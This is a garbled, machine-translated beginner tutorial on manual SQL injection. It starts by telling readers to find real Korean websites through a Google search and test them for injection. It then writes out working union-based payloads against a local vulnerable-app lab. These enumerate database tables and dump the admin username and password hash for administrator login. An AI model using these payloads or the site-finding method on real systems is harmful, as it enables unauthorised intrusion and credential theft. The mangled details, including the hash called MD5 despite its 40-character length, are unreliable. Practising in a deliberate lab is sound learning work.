Manual SQL injection (elementary) I also learned SQL injection for a week. This article is intended for beginners.
SQL injection attack and defense http://www.ddooo.com/softdown/50160.htm
1. find the website with SQL injection
Method: In google, enter site: kr inurl: php? Id = open the url that appears, and add '(comma) after the URL. if the page jumps, there may be SQL injection.
Principle: Generally, the URLs are similar to search. php? The SQL statement corresponding to search = hello may be select * from table_name where column_name = 'hello'. If 'is added after the URL, the SQL statement is select * from table_name where column_name = 'hello'' if the website does not perform SQL injection filtering, an error will be reported. there is a Web vulnerability drill project on GitHub. you can download the project and deploy it on your computer (I will not teach you how to deploy it here, but most people familiar with Web programming will). https://github.com/710leo/z
2. check the field length
(1)Http: // localhost/ZVulDrill-master/search. php? Search = hello % 'Order by 1 -- % 20 is equivalent to the SQL statement select * from table_name where colmun_name like '% hello %' order by 1 -- ', which indicates that MySQL has three annotations-one of them but -- it must be followed by a space, but the url will automatically remove the last space. you need to manually enter % 20 to comment out the following SQL statement not to execute
(2)At this time, there is no error on the page. an error occurs when order by 10 is added in the same way, and order by 5 is incorrect. The order by 4 page correctly indicates that the field length is 43, and the database information is viewed.
Method: Use the union statement to extract data
(1)Http: // localhost/ZVulDrill-master/search. php? Search = hello % 'and 1 = 2 union select 1, 2, 4 -- % 20sql statement select * from table_name where column_name like' % hello % 'and 1 = 2 union select 1, 2, 3, in the SQL statement before 4union, the where condition is always false, and the result set is empty. the whole SQL statement returns the result set after union.
(2)Shows how to obtain information such as MySQL version user database. the page displays 1 and 2. you can use this to display the required information. http: // localhost/ZVulDrill-master/search. php? Search = hello % 'and 1 = 2 union select 1, version (), user (), 4 -- % 20: Replace 2, 3 with version (), user () page is as follows
Similarly, change user () to database () to get the database name zvuldrilluser () ------------ wkdty @ localhostversion () -------------- 5.6.17 (versions later than 5.0 contain information of all databases in a information_schema virtual database .) database () ------------- zvuldrill4. obtain database data
(1)Get table name http: // localhost/ZVulDrill-master/search. php? Search = hello % 'and 1 = 2 union select 1, 2, GROUP_CONCAT (DISTINCT table_name), 4 from information_schema.columns where table_schema = 'zvuldrill' -- % 20
There are three tables in the database. what is most useful to us is the admin table. you can access the website as an administrator to see various information.
(2)Obtain the field name http: // localhost/ZVulDrill-master/search. php? Search = hello % 'and 1 = 2 union select 1, 2, GROUP_CONCAT (DISTINCT column_name), 4 from information_schema.columns where table_name = 'admin' -- % 20
(3)Get data http: // localhost/ZVulDrill-master/search. php? Search = hello % 'and 1 = 2 union select 1, 2, GROUP_CONCAT (DISTINCT admin_id, admin_name, admin_pass), 4 from admin -- % 20
Admin_id 1 admin_name adminadmin_pass d033e22ae348aeb5660fc2140aec35850c4da997 (admin is obtained after md5 decryption) based on the user logon portal, find the background logon portal and enter the website as an administrator
